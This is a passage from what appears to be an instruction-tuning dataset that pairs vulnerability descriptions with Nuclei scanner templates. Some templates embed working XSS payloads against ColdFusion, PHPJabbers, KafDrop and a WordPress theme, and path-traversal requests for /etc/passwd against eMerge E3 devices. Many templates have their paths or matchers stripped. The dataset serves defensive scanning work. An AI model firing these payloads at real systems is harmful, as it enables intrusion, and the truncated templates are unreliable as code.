\"{{BaseURL}}{{paths}}\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2014-7169"} {"instruction": "Generate a Nuclei template for: E-Cology V9 - SQL Injection", "input": "Title: E-Cology V9 - SQL Injection\nSummary: E-Cology V9 - SQL Injection. Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: CNVD-2023-12632\n\ninfo:\n name: E-Cology V9 - SQL Injection\n author: daffainfo\n severity: high\n description: Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.\n tags: cnvd,cnvd2023,ecology,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"283f42764da6dba2522412916b031080\" \n - \"\"autoCount\"\" \n - \"\"autoGet\"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "CNVD-2023-12632"} {"instruction": "Generate a Nuclei template for CVE-2009-1872", "input": "Title: Cross-Site Scripting (XSS) in adobe coldfusion\nSummary: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: adobe coldfusion\nIndicators: error, vulnerability detected", "output": "id: CVE-2009-1872\n\ninfo:\n name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting\n author: princechaddha\n severity: medium\n description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.\n tags: cve2009,cve,adobe,xss,coldfusion,tenable,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2009-1872"} {"instruction": "Generate a Nuclei template for CVE-2023-4115", "input": "Title: Cross-Site Scripting (XSS) in phpjabbers cleaning_business_software\nSummary: A vulnerability classified as problematic has been found in PHP Jabbers Cleaning Business 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. VDB-235962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: phpjabbers cleaning_business_software\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-4115\n\ninfo:\n name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-4115"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: kafdrop-xss\n\ninfo:\n name: KafDrop - Cross-Site Scripting\n author: dhiyaneshDk\n severity: high\n description: KafDrop contains a cross-site scripting vulnerability. It allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server.\n tags: kafdrop,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E\" \n matchers:\n - type: word\n words:\n - \"Kafdrop\" \n - \"\" \n part: body\n condition: and\n - type: status\n status:\n - 500", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template to detect Use of Default Credentials", "input": "Title: Use of Default Credentials (CWE-1392)\nSummary: The product uses default credentials (such as passwords or cryptographic keys) for potentially critical functionality. It is common practice for products to be designed to use\n\tdefault keys, passwords, or other mechanisms for\n\tauthentication. The rationale is to simplify the\n\tmanufacturing process or the system administrator's task of\n\tinstallation and deployment into an enterprise. However, if\n\tadmins do not change the defaults, it is easier for attackers\n\tto bypass authentication quickly acro\nVulnerability Type: Use of Default Credentials\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: lucee-default-login\n\ninfo:\n name: Lucee - Default Login\n author: jpg0mez\n severity: high\n description: Lucee admin panel using the default login password was discovered.\n tags: lucee,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "high", "id": "CWE-1392"} {"instruction": "Generate a Nuclei template for: Unrestricted Oracle DB Access", "input": "Title: Unrestricted Oracle DB Access\nSummary: Unrestricted Oracle DB Access. Identifies unrestricted inbound access to Oracle databases in Amazon EC2 instances, which increases the risk of unauthorized access and attacks.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: ec2-unrestricted-oracle\n\ninfo:\n name: Unrestricted Oracle DB Access\n author: princechaddha\n severity: critical\n description: Identifies unrestricted inbound access to Oracle databases in Amazon EC2 instances, which increases the risk of unauthorized access and attacks.\n tags: cloud,devops,aws,amazon,ec2,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "ec2-unrestricted-oracle"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: wp-real-estate-xss\n\ninfo:\n name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.\n tags: packetstorm,wordpress,wp-theme,wp,xss,realestate,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template for CVE-2020-11991", "input": "Title: Vulnerability (CWE-611) in apache cocoon\nSummary: When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.\nVulnerability Type: Vulnerability (CWE-611)\nSeverity: high\nAffected Products: apache cocoon\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-11991\n\ninfo:\n name: Apache Cocoon 2.1.12 - XML Injection\n author: pikpikcu\n severity: high\n description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.\n tags: cve,cve2020,apache,xml,cocoon,xxe,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/v2/api/product/manger/getInfo\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-11991"} {"instruction": "Generate a Nuclei template for CVE-2019-25152", "input": "Title: Unknown Vulnerability in tychesoftwares abandoned_cart_lite_for_woocommerce and others\nSummary: The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in user input that will execute on the admin dashboard.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: tychesoftwares abandoned_cart_lite_for_woocommerce, tychesoftwares abandoned_cart_pro_for_woocommerce\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-25152\n\ninfo:\n name: Abandoned Cart Lite for WooCommerce < 5.2.0 - Cross-Site Scripting\n author: DhiyaneshDK\n severity: high\n description: The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping.\n tags: cve,cve2019,wpscan,wordpress,wp,wp-plugin,woocommerce-abandoned-cart,xss,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2019-25152"} {"instruction": "Generate a Nuclei template for: CraftMyPDF API Test", "input": "Title: CraftMyPDF API Test\nSummary: CraftMyPDF API Test. Generate PDF documents from templates with a drop-and-drop editor and a simple API\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-craftmypdf\n\ninfo:\n name: CraftMyPDF API Test\n author: daffainfo\n severity: info\n description: Generate PDF documents from templates with a drop-and-drop editor and a simple API\n tags: token-spray,craftmypdf\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"template_id\":\" \n - \"\"name\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-craftmypdf"} {"instruction": "Generate a Nuclei template for: jshERP - Information Disclosure", "input": "Title: jshERP - Information Disclosure\nSummary: jshERP - Information Disclosure. jshERP that can reveal sensitive information including system credentials without credentials.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: CNVD-2020-63964\n\ninfo:\n name: jshERP - Information Disclosure\n author: brucelsone\n severity: high\n description: jshERP that can reveal sensitive information including system credentials without credentials.\n tags: cnvd,cnvd2020,jsherp,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jshERP-boot/user/getAllList;.ico\" \n matchers:\n - type: word\n words:\n - \"\"username\":\" \n - \"\"loginName\":\" \n - \"\"password\":\" \n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "CNVD-2020-63964"} {"instruction": "Generate a Nuclei template for: Bitrix24 Installation Exposure", "input": "Title: Bitrix24 Installation Exposure\nSummary: Bitrix24 Installation Exposure. Bitrix24 is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: bitrix24-installer\n\ninfo:\n name: Bitrix24 Installation Exposure\n author: DhiyaneshDK\n severity: high\n description: Bitrix24 is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,bitrix24,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Start installation\" \n - \"Bitrix24\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "bitrix24-installer"} {"instruction": "Generate a Nuclei template for: box phishing Detection", "input": "Title: box phishing Detection\nSummary: box phishing Detection. A box phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: box-phish\n\ninfo:\n name: box phishing Detection\n author: rxerium\n severity: info\n description: A box phishing website was detected\n tags: phishing,box-storage,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Secure File Sharing, Storage, and Collaboration | Box\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "box-phish"} {"instruction": "Generate a Nuclei template for: Disable Apache2 HTTP TRACE Method", "input": "Title: Disable Apache2 HTTP TRACE Method\nSummary: Disable Apache2 HTTP TRACE Method. The HTTP TRACE method should be disabled to prevent Cross-Site Tracing (XST) attacks.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: file-disable-http-trace-method\n\ninfo:\n name: Disable Apache2 HTTP TRACE Method\n author: pussycat0x\n severity: high\n description: The HTTP TRACE method should be disabled to prevent Cross-Site Tracing (XST) attacks.\n tags: audit,config,file,apache,hardening\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "file-disable-http-trace-method"} {"instruction": "Generate a Nuclei template for: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload", "input": "Title: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload\nSummary: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload. The Kadence Blocks for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the process_fields function in versions up to, and including, 3.1.10. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: wp-kadence-blocks-rce\n\ninfo:\n name: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: The Kadence Blocks for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the process_fields function in versions up to, and including, 3.1.10. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "wp-kadence-blocks-rce"} {"instruction": "Generate a Nuclei template for CVE-2000-0760", "input": "Title: Unknown Vulnerability in apache tomcat\nSummary: The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: apache tomcat\nIndicators: error, vulnerability detected", "output": "id: CVE-2000-0760\n\ninfo:\n name: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure\n author: Thabisocn,0x_Akoko\n severity: medium\n description: Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access.\n tags: cve,cve2000,jakarta,tomcat,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/examples/jsp/snp/anything.snp\" \n matchers:\n - type: word\n words:\n - \"Request Information\" \n - \"Path info\" \n - \"Server name\" \n - \"Remote address\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2000-0760"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: extreme-netconfig-ui\n\ninfo:\n name: Extreme NetConfig UI Panel - Detect\n author: pussycat0x\n severity: info\n description: Extreme NetConfig UI panel was detected.\n tags: panel,tech,hiveos,extreme,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php5\" \n matchers:\n - type: word\n words:\n - \"Extreme NetConfig UI\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: httpbin-panel\n\ninfo:\n name: HTTPBin Login Panel - Detect\n author: Adam Crosser\n severity: info\n description: HTTPBin login panel was detected.\n tags: panel,httpbin,oss,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"httpbin.org\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Harvard Art Museums API Test", "input": "Title: Harvard Art Museums API Test\nSummary: Harvard Art Museums API Test. Harvard Art. Tags: token-spray, harvardart\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-harvardart\n\ninfo:\n name: Harvard Art Museums API Test\n author: daffainfo\n severity: info\n description: Harvard Art\n tags: token-spray,harvardart\n\nhttp:\n - method: GET\n path:\n - \"https://api.harvardartmuseums.org/color/34838442?apikey={{token}}\" \n matchers:\n - type: word\n words:\n - \"\"colorid\"\" \n - \"\"name\"\" \n - \"\"hex\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-harvardart"} {"instruction": "Generate a Nuclei template for: BlackEnergy VBS Agent Malware Hash - Detect", "input": "Title: BlackEnergy VBS Agent Malware Hash - Detect\nSummary: BlackEnergy VBS Agent Malware Hash - Detect. Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: blackenergy-vbs-malware-hash\n\ninfo:\n name: BlackEnergy VBS Agent Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs\n tags: malware,blackenergy\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "blackenergy-vbs-malware-hash"} {"instruction": "Generate a Nuclei template for: Yonyou U8 bx_historyDataCheck - SQL Injection", "input": "Title: Yonyou U8 bx_historyDataCheck - SQL Injection\nSummary: Yonyou U8 bx_historyDataCheck - SQL Injection. Yonyou U8 Grp contains a SQL injection vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: yonyou-u8-sqli\n\ninfo:\n name: Yonyou U8 bx_historyDataCheck - SQL Injection\n author: xianke\n severity: high\n description: Yonyou U8 Grp contains a SQL injection vulnerability.\n tags: time-based-sqli,yonyou,grp,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"GRP-U8\" \n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "yonyou-u8-sqli"} {"instruction": "Generate a Nuclei template for CVE-2023-2023", "input": "Title: Cross-Site Scripting (XSS) in kunalnagar custom_404_pro\nSummary: The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: kunalnagar custom_404_pro\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-2023\n\ninfo:\n name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-2023"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ilch-admin-panel\n\ninfo:\n name: Ilch CMS Admin Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: Ilch CMS admin login panel was detected.\n tags: panel,ilch,cms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/admin/admin/login/index/\" \n matchers:\n - type: word\n words:\n - \"ilch_token\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-34040", "input": "Title: Path Traversal in CVE-2025-34040\nSummary: An arbitrary file upload vulnerability exists in the Zhiyuan OA platform via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.\nVulnerability Type: Path Traversal\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-34040\n\ninfo:\n name: Zhiyuan OA Platform - Arbitrary File Upload\n author: iamnoooob,pdresearch\n severity: critical\n description: An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.\n tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"officeTransResultFlag\" \n - \"\"success\":true\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{marker}}\" \n part: body", "category": "cve", "severity": "medium", "id": "CVE-2025-34040"} {"instruction": "Generate a Nuclei template for CVE-2023-2825", "input": "Title: Path Traversal in gitlab gitlab\nSummary: An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: gitlab gitlab\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-2825\n\ninfo:\n name: GitLab 16.0.0 - Path Traversal\n author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch\n severity: high\n description: An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"726f6f743a78\" \n - type: word\n words:\n - \"application/octet-stream\" \n - \"etc%2Fpasswd\" \n part: header\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-2825"} {"instruction": "Generate a Nuclei template for CVE-2019-7254", "input": "Title: Path Traversal in nortekcontrol linear_emerge_essential_firmware and others\nSummary: Linear eMerge E3-Series devices allow File Inclusion.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: nortekcontrol linear_emerge_essential_firmware, nortekcontrol linear_emerge_elite_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-7254\n\ninfo:\n name: eMerge E3 1.00-06 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.\n tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?c=../../../../../../etc/passwd%00\" \n - \"{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-7254"} {"instruction": "Generate a Nuclei template for: fish - Privilege Escalation", "input": "Title: fish - Privilege Escalation\nSummary: fish - Privilege Escalation. fish is a user-friendly command-line shell for Unix-like operating systems. It provides features such as syntax highlighting, autosuggestions, and a built-in scripting language. Fish aims to be easy to use and learn, making it a popular choice for both interactive shell usage and scripting.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-fish\n\ninfo:\n name: fish - Privilege Escalation\n author: daffainfo\n severity: high\n description: fish is a user-friendly command-line shell for Unix-like operating systems. It provides features such as syntax highlighting, autosuggestions, and a built-in scripting language. Fish aims to be easy to use and learn, making it a popular choice for both interactive shell usage and scripting.\n tags: code,linux,fish,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-fish"} {"instruction": "Generate a Nuclei template for: Smartsheet API Test", "input": "Title: Smartsheet API Test\nSummary: Smartsheet API Test. Allows you to programmatically access and Smartsheet data and account information\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-smartsheet\n\ninfo:\n name: Smartsheet API Test\n author: daffainfo\n severity: info\n description: Allows you to programmatically access and Smartsheet data and account information\n tags: token-spray,smartsheet\n\nhttp:\n - method: GET\n path:\n - \"https://api.smartsheet.com/2.0/home?include=source\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"sheets\":\" \n - \"\"folders\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-smartsheet"} {"instruction": "Generate a Nuclei template for: D-Link DAP-1325 - Information Disclosure", "input": "Title: D-Link DAP-1325 - Information Disclosure\nSummary: D-Link DAP-1325 - Information Disclosure. Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: dlink-config-dump\n\ninfo:\n name: D-Link DAP-1325 - Information Disclosure\n author: gy741\n severity: critical\n description: Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.\n tags: misconfig,config,dump,dlink,auth-bypass,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportSettings.sh\" \n matchers:\n - type: word\n words:\n - \"Password\" \n part: body\n - type: regex\n part: header\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "dlink-config-dump"} {"instruction": "Generate a Nuclei template for: Permissions Installer Exposure", "input": "Title: Permissions Installer Exposure\nSummary: Permissions Installer Exposure. Permissions Installer is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: permissions-installer\n\ninfo:\n name: Permissions Installer Exposure\n author: pussycat0x\n severity: high\n description: Permissions Installer is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,permissions,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \" Permissions | Installer\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "permissions-installer"} {"instruction": "Generate a Nuclei template for: Define Index Page Suffix and Error Page for Bucket Website Configuration", "input": "Title: Define Index Page Suffix and Error Page for Bucket Website Configuration\nSummary: Define Index Page Suffix and Error Page for Bucket Website Configuration. Ensure that website index (main) page suffix and error (404 not found) page are defined for your Google Cloud Storage buckets with static website configuration. Specifying these configurations ensures proper functionality and user experience for websites hosted on Cloud Storage buckets.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-bucket-website-config-not-defined\n\ninfo:\n name: Define Index Page Suffix and Error Page for Bucket Website Configuration\n author: 